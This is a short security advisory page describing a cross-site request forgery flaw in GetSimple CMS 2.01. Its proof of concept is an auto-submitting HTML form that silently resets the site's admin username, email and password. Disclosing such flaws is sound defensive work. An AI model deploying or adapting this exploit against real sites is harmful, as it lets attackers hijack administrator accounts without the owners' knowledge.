Home
Consulting
Advisories
Software
Articles
Contact

GetSimple 2.01 Cross-site Request Forgery

Legacy Advisories

Description

A cross-site request forgery vulnerability in GetSimple 2.01 can be exploited to create a user's password.

Proof Of Concept

<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/getsimple_2.01/admin/settings.php">
            <input type="hidden" name="sitename" value="test" />
            <input type="hidden" name="siteurl" value="http://localhost/getsimple_2.01/" />
            <input type="hidden" name="timezone" value="America/New_York" />
            <input type="hidden" name="lang" value="en_US" />
            <input type="hidden" name="show_htmleditor" value="1" />
            <input type="hidden" name="user" value="new_name" />
            <input type="hidden" name="email" value="test@test.com" />
            <input type="hidden" name="sitepwd" value="Password1" />
            <input type="hidden" name="sitepwd_confirm" value="Password1" />
            <input type="hidden" name="submitted" value="Save Settings" />
        </form>
    </body>
</html>


Copyright © 2018 AutoSec Tools LLC